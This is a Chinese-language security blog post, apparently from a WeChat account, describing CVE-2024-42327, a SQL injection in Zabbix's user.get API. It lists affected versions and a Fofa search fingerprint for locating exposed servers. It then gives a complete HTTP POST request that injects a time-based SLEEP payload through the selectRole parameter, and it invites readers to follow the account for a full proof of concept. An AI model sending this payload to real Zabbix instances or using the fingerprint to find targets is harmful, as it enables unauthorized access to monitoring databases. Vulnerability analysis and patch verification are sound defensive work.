Zabbix 存在SQL注入漏洞 (CVE-2024-42327)

Zabbix 存在SQL注入漏洞 (CVE-2024-42327)

Mstir 星悦安全 2024-12-14 04:20

点击上方
蓝字
关注我们 并设为
星标

0x00 前言

Zabbix 是一款可监控网络的众多参数以及服务器、虚拟机、应用程序、服务、数据库、网站、云等的健康状况和完整性。Zabbix 使用灵活的通知机制,允许用户为几乎任何事件配置基于电子邮件的警报。这允许对服务器问题做出快速反应。Zabbix 基于存储的数据提供报告和数据可视化功能.

受影响版本:

- 6.0.0 – 6.0.31
- 6.4.0 – 6.4.16
- 7.0.0

Fofa指纹:app=”ZABBIX-监控系统”



0x01 漏洞分析&复现

Zabbix 前端上具有默认 User 角色或具有任何其他授予 API 访问权限的角色的非 admin 用户帐户可以利用此漏洞。SQLi 存在于 addRelatedObjects 函数的 CUser 类中,此函数是从 CUser.get 函数调用的,该函数可供具有 API 访问权限的每个用户使用。

Payload:

POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

POC使用:

0x02 源码下载

标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转

漏洞POC关注公众号发送 241214 获取!


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!